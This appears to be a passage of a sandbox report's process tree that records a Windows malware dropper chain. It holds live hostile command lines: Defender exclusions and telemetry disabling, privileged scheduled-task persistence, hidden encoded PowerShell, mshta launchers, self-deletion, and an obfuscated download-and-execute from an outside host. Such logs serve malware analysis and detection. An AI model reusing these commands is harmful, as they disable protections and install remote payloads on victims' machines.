        "C:\Users\Admin\AppData\Local\Temp\is-ID3D0.tmp\stats.tmp" /SL5="$20540,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        14⤵
        
        PID:6228
        
        C:\Users\Admin\AppData\Local\Temp\is-0T8OP.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0T8OP.tmp\Setup.exe" /Verysilent
        15⤵
        
        PID:7192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        16⤵
        
        PID:6812
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        17⤵
        Creates scheduled task(s)
        
        PID:7424
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        16⤵
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\Services.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Services.exe"
        16⤵
        
        PID:8568
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        17⤵
        
        PID:10100
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        18⤵
        Creates scheduled task(s)
        
        PID:6732
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cylcun2x.zrn\anyname.exe & exit
        9⤵
        
        PID:5960
        
        C:\Users\Admin\AppData\Local\Temp\cylcun2x.zrn\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\cylcun2x.zrn\anyname.exe
        10⤵
        
        PID:5880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gmjo2y5.avq\BsInstFile.exe & exit
        9⤵
        
        PID:6340
        
        C:\Users\Admin\AppData\Local\Temp\4gmjo2y5.avq\BsInstFile.exe
        
        C:\Users\Admin\AppData\Local\Temp\4gmjo2y5.avq\BsInstFile.exe
        10⤵
        
        PID:1680
        
        C:\ProgramData\6285514.exe
        
        "C:\ProgramData\6285514.exe"
        11⤵
        
        PID:6704
        
        C:\ProgramData\2286636.exe
        
        "C:\ProgramData\2286636.exe"
        11⤵
        
        PID:6724
        
        C:\ProgramData\3373770.exe
        
        "C:\ProgramData\3373770.exe"
        11⤵
        
        PID:7124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u1geyvms.l4o\install.exe & exit
        9⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\u1geyvms.l4o\install.exe
        
        C:\Users\Admin\AppData\Local\Temp\u1geyvms.l4o\install.exe
        10⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\7zS4B52.tmp\SimplInst.exe
        
        .\SimplInst.exe
        11⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\SimplInst.exe
        
        .\SimplInst.exe /S /site_id "216660"
        12⤵
        
        PID:6492
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        13⤵
        
        PID:1332
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        14⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:6476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        16⤵
        
        PID:6740
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        17⤵
        
        PID:6368
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        14⤵
        
        PID:9948
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        16⤵
        
        PID:7248
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        13⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        14⤵
        
        PID:208
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        15⤵
        
        PID:3892
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        15⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        13⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        14⤵
        
        PID:7436
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        15⤵
        
        PID:1148
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        15⤵
        
        PID:7896
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gnXOIwurT" /SC once /ST 10:34:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        13⤵
        Creates scheduled task(s)
        
        PID:7692
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gnXOIwurT"
        13⤵
        
        PID:6548
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqrd4c5q.d5x\askinstall52.exe & exit
        9⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\yqrd4c5q.d5x\askinstall52.exe
        
        C:\Users\Admin\AppData\Local\Temp\yqrd4c5q.d5x\askinstall52.exe
        10⤵
        
        PID:6576
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        11⤵
        
        PID:756
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        12⤵
        Kills process with taskkill
        
        PID:4192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3gqcaey.txm\Cleanpro13.exe & exit
        9⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\r3gqcaey.txm\Cleanpro13.exe
        
        C:\Users\Admin\AppData\Local\Temp\r3gqcaey.txm\Cleanpro13.exe
        10⤵
        
        PID:5600
        
        C:\Users\Admin\Documents\I4b1sguuZvXLoSGWKO6SRBo5.exe
        
        "C:\Users\Admin\Documents\I4b1sguuZvXLoSGWKO6SRBo5.exe"
        11⤵
        
        PID:6640
        
        C:\Users\Admin\Documents\PvtCQaTQqlFBtLmSpSFlUxgS.exe
        
        "C:\Users\Admin\Documents\PvtCQaTQqlFBtLmSpSFlUxgS.exe"
        11⤵
        
        PID:6652
        
        C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe
        
        "C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"
        11⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        12⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe" ) do taskkill /f -im "%~nxA"
        13⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE
        
        X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV
        14⤵
        
        PID:9108
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        15⤵
        
        PID:10176
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f -im "QRbBihrFhLurLq46TrX_kGy5.exe"
        14⤵
        Kills process with taskkill
        
        PID:5460
        
        C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe
        
        "C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe"
        11⤵
        
        PID:5156
        
        C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe
        
        "C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe"
        12⤵
        
        PID:7536
        
        C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe
        
        "C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe"
        11⤵
        
        PID:204
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        12⤵
        
        PID:7836
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        13⤵
        
        PID:4808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        12⤵
        
        PID:9824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffd8a6e4f50,0x7ffd8a6e4f60,0x7ffd8a6e4f70
        13⤵
        
        PID:9936
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 204 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe"
        12⤵
        
        PID:9324
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 204
        13⤵
        Kills process with taskkill
        
        PID:9292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 204 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe"
        12⤵
        
        PID:7680
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 204
        13⤵
        Kills process with taskkill
        
        PID:7368
        
        C:\Users\Admin\Documents\hOILsBI_M9kCLusbsCortAlX.exe
        
        "C:\Users\Admin\Documents\hOILsBI_M9kCLusbsCortAlX.exe"
        11⤵
        
        PID:5248
        
        C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe
        
        "C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe"
        11⤵
        
        PID:2828
        
        C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe
        
        "C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe"
        12⤵
        
        PID:7748
        
        C:\Users\Admin\Documents\MZhxntRbcmOlGwChLEerVriF.exe
        
        "C:\Users\Admin\Documents\MZhxntRbcmOlGwChLEerVriF.exe"
        11⤵
        
        PID:2368
        
        C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
        
        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
        12⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        12⤵
        Creates scheduled task(s)
        
        PID:2292
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        12⤵
        Creates scheduled task(s)
        
        PID:4004
        
        C:\Users\Admin\Documents\0gKIMlY7vzHPR64LZvW37NYk.exe
        
        "C:\Users\Admin\Documents\0gKIMlY7vzHPR64LZvW37NYk.exe"
        11⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        12⤵
        
        PID:7484
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Nobile.docm
        12⤵
        
        PID:7560
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        13⤵
        
        PID:7720
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm
        14⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com
        
        Rimasta.exe.com J
        14⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J
        15⤵
        
        PID:8568
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J
        16⤵
        
        PID:8948
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J
        17⤵
        
        PID:8200
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J
        18⤵
        
        PID:8480
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe
        19⤵
        
        PID:9060
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        14⤵
        Runs ping.exe
        
        PID:8232
        
        C:\Users\Admin\Documents\tFrfaZnX1_IzC86XaHG4irv6.exe
        
        "C:\Users\Admin\Documents\tFrfaZnX1_IzC86XaHG4irv6.exe"
        11⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im tFrfaZnX1_IzC86XaHG4irv6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\tFrfaZnX1_IzC86XaHG4irv6.exe" & del C:\ProgramData\*.dll & exit
        12⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im tFrfaZnX1_IzC86XaHG4irv6.exe /f
        13⤵
        Kills process with taskkill
        
        PID:7344
        
        C:\Users\Admin\Documents\Qgkb2P6cA2a0wYKqHFIKEjc1.exe
        
        "C:\Users\Admin\Documents\Qgkb2P6cA2a0wYKqHFIKEjc1.exe"
        11⤵
        
        PID:2172
        
        C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe
        
        "C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe"
        11⤵
        
        PID:2208
        
        C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe
        
        "C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe"
        12⤵
        
        PID:7380
        
        C:\Users\Admin\Documents\6yYZN7Wh1AXS2c2KVJKcjiyp.exe
        
        "C:\Users\Admin\Documents\6yYZN7Wh1AXS2c2KVJKcjiyp.exe"
        11⤵
        
        PID:1008
        
        C:\Users\Admin\Documents\vMMcRvKo3vJf6PhyzbA2Qwfs.exe
        
        "C:\Users\Admin\Documents\vMMcRvKo3vJf6PhyzbA2Qwfs.exe"
        11⤵
        
        PID:1524
        
        C:\Users\Admin\Documents\GroOnQTdxcj6vXaDA0EPtT9Y.exe
        
        "C:\Users\Admin\Documents\GroOnQTdxcj6vXaDA0EPtT9Y.exe"
        11⤵
        
        PID:7348
        
        C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        12⤵
        
        PID:7456
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        12⤵
        
        PID:7336
        
        C:\Program Files (x86)\Company\NewProduct\inst001.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
        12⤵
        
        PID:7572
        
        C:\Users\Admin\Documents\UnxvYCIMOGUi8f9wkA0SrmfR.exe
        
        "C:\Users\Admin\Documents\UnxvYCIMOGUi8f9wkA0SrmfR.exe"
        11⤵
        
        PID:7396
        
        C:\Users\Admin\Documents\A06WbB5_f9KtstFPdTxGbT1b.exe
        
        "C:\Users\Admin\Documents\A06WbB5_f9KtstFPdTxGbT1b.exe"
        11⤵
        
        PID:7420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SOS='24#4e#61#6e#6f#3d#27#4a#4f#4f#45#58#27#2e#72#65#70#6c#61#63#65#28#27#4a#4f#4f#27#2c#27#49#27#29#3b#73#61#6c#20#4f#59#20#24#4e#61#6e#6f#3b#64#6f#20#7b#24#70#69#6e#67#20#3d#20#74#65#73#74#2d#63#6f#6e#6e#65#63#74#69#6f#6e#20#2d#63#6f#6d#70#20#67#6f#6f#67#6c#65#2e#63#6f#6d#20#2d#63#6f#75#6e#74#20#31#20#2d#51#75#69#65#74#7d#20#75#6e#74#69#6c#20#28#24#70#69#6e#67#29#3b#24#70#32#32#20#3d#20#5b#45#6e#75#6d#5d#3a#3a#54#6f#4f#62#6a#65#63#74#28#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#54#79#70#65#5d#2c#20#33#30#37#32#29#3b#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#72#76#69#63#65#50#6f#69#6e#74#4d#61#6e#61#67#65#72#5d#3a#3a#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#20#3d#20#24#70#32#32#3b#24#61#61#3d#27#77#68#65#78#2d#4f#62#68#65#78#6a#65#27#3b#24#6c#6c#3d#27#28#27#27#68#68#65#78#74#74#68#65#78#70#73#3a#68#65#78#2f#68#65#78#68#65#78#2f#6d#61#6e#6f#72#61#6b#75#73#2e#74#6f#70#2f#50#30#57#33#52#31#2f#49#4e#2e#50#4e#47#27#27#29#27#3b#20#24#62#62#3d#27#63#68#65#78#74#20#4e#65#68#65#78#68#65#78#74#2e#57#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#66#66#3d#27#6c#6f#68#65#78#68#65#78#61#64#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#53#27#3b#20#24#68#68#3d#27#74#68#65#78#68#65#78#72#69#68#65#78#68#65#78#68#65#78#6e#67#27#3b#20#24#63#31#3d#27#28#68#65#78#68#65#78#4e#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#63#63#3d#27#62#43#68#65#78#68#65#78#68#65#78#6c#69#65#68#65#78#68#65#78#68#65#78#6e#74#27#3b#20#24#64#64#3d#27#29#2e#44#6f#68#65#78#68#65#78#68#65#78#68#65#78#77#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#6e#27#3b#20#24#52#4f#4f#4d#3d#28#24#63#31#2c#24#61#61#2c#24#62#62#2c#24#63#63#2c#24#64#64#2c#24#66#66#2c#24#68#68#2c#24#6c#6c#20#2d#4a#6f#69#6e#20#27#27#29#3b#24#52#4f#4f#4d#3d#24#52#4f#4f#4d#2e#72#65#70#6c#61#63#65#28#27#68#65#78#27#2c#20#27#27#29#3b#20#4f#59#20#24#52#4f#4f#4d#7c#4f#59#3b';Invoke-Expression (-join ($SOS -split '#' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
        12⤵
        
        PID:3644
        
        C:\Users\Admin\Documents\4vxFy_Ee6bOhN04lcQHg_OZ4.exe
        
        "C:\Users\Admin\Documents\4vxFy_Ee6bOhN04lcQHg_OZ4.exe"
        11⤵
        
        PID:7632
        
        C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe
        
        "C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"
        11⤵
        
        PID:8112
        
        C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe
        
        "C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"
        12⤵
        
        PID:7284
        
        C:\ProgramData\Stub.exe
        
        "C:\ProgramData\Stub.exe"
        12⤵
        
        PID:8164
        
        C:\Users\Admin\AppData\Local\DriverAudioOption.exe
        
        "C:\Users\Admin\AppData\Local\DriverAudioOption.exe"
        13⤵
        
        PID:5884
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"' & exit
        14⤵
        
        PID:8236
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"'
        15⤵
        Creates scheduled task(s)
        
        PID:9372
        
        C:\Users\Admin\AppData\Roaming\AudioEngine.exe
        
        "C:\Users\Admin\AppData\Roaming\AudioEngine.exe"
        14⤵
        
        PID:9648
        
        C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"
        13⤵
        
        PID:7184
        
        C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe
        
        "C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"
        12⤵
        
        PID:7008
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exe & exit
        9⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exe
        
        C:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exe
        10⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxinc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exe" & del C:\ProgramData\*.dll & exit
        11⤵
        
        PID:8940
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Vidboxinc.exe /f
        12⤵
        Kills process with taskkill
        
        PID:9040
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cp0eixw.mfe\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\0cp0eixw.mfe\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\0cp0eixw.mfe\gcleaner.exe /mixfive
        10⤵
        
        PID:4736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxvscj3d.z15\bumperWW1.exe & exit
        9⤵
        
        PID:4548
        
